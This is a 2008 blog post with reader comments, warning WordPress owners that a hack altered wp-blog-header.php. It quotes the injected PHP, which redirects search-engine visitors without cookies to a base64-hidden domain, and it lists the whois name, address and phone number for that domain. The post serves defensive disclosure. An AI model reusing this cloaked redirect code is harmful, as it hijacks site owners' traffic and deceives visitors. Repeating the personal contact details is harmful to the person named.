Traffic Hijacking

anyone noticed huge drop in traffc without any chage in SERP !!

Using wordpress?

then read on!!

then your wordpress is hacked. check your wp-blog-header.php file.

hacker redirectes SE traffic visitors to his site it there is no past cookie set on his site !!!

my wp header file looked like this

Quote:
<?php $seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }

if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?><?php

if (! isset($wp_did_header)):
if ( !file_exists( dirname(__FILE__) . ‘/wp-config.php’) ) {
if ( strstr( $_SERVER['PHP_SELF'], ‘wp-admin’) ) $path = ”;
else $path = ‘wp-admin/’;

require_once( dirname(__FILE__) . ‘/wp-includes/functions.php’);
wp_die(”There doesn’t seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href=’http://codex.wordpress.org/Editing_wp-config.php’>We got it</a>. You can <a href=’{$path}setup-config.php’>create a <code>wp-config.php</code> file through a web interface</a>, but this doesn’t work for all server setups. The safest way is to manually create the file.”, “WordPress › Error”);
}

$wp_did_header = true;

require_once( dirname(__FILE__) . ‘/wp-config.php’);

wp();
gzip_compression();

require_once(ABSPATH . WPINC . ‘/template-loader.php’);

endif;

?>

Check whether your header file is like this and chage iif its hacked!!

its redirecting to anyresults.net

whois info of that domain .

Administrative Contact:
N/A
Doren Arnold ()
96 Mowat Ave
Toronto
3553,M6K 3M1
US
Tel. +1.416545545

check immediately and fix if you have this problem. i think we should report this in wp community forum and webhosting of that site

Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Propeller
  • StumbleUpon

This entry was posted on Thursday, December 4th, 2008 at 3:15 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.

16 Responses to “Traffic Hijacking”

  1. Linaeve says:

    any update for this matter ?

    #32,833 in 13 days, compare his traffic to Digitalpoint.

  2. Gus says:

    hello.. will anyone tell me how their wp-blogheader file get edited?
    why do u guys give permission to other user to use ur files ?

  3. Prisca says:

    was you header chmodded 777 ?

  4. Zahur says:

    You need to give us more details than that.

    Sorry for your luck but I am assuming you are the only one with this issue.

  5. Caine says:

    As far as I know it’s a hack of the wp-config and there is no official fix so far, it even works with the latest WP version. It redirects all traffic from google, but just from google, if you have bookmarked your site and access it, everything looks normal.

    It’s a widespread problem at the moment and certainly so single incident.

  6. Vian says:

    Traffic to my sites has also decreased but no such coding is in my header.php
    Please give some more details.

  7. Hummer says:

    Look in your .htaccess, it has a referrer based redirect if you were hacked as far as I know.

  8. Halen says:

    Its not a single incident!!! I had the problem in 2 of my wordpress sites!! A loss of huge traffic…!!! JUST FIXED IT…!! It must be reported to WP community! How such hacks occurs to the xtreme secure WP??

    Its redirecting to its redirecting to anyresults.net

    We will see more users with the problem soon!!!

    Any FIXES available to this hack? How can we prevent?

  9. Wakinyela says:

    see

    there are so many out there

    not a single incident !!

  10. Fidelio says:

    see

    just give a search on google using anyresults.net !!

    a new 302 hack

    see

  11. Psyche says:

    er.. but how did your wp-blog-header.php changed??
    does anyone else have the access to edit your files?
    who edited your wp-blog-header.php ?

  12. Anonymous says:

    Whoa! Thanks for letting us know. Thankfully, I am so far so good…. Gotta watch out for this prick!!!

  13. Anonymous says:

    He’s hit a lot of sites, check out the Alexa graph…

    #32,833 in 13 days, compare his traffic to Digitalpoint.

  14. The business loans seem to be important for guys, which are willing to start their company. In fact, this is very comfortable to get a short term loan.

Leave a Reply

Categories

  • Menu 1
  • Menu 2

Categories

  • Menu 1
  • Menu 2

Themes by WP Blog Shop| Entries (RSS) and Comments (RSS)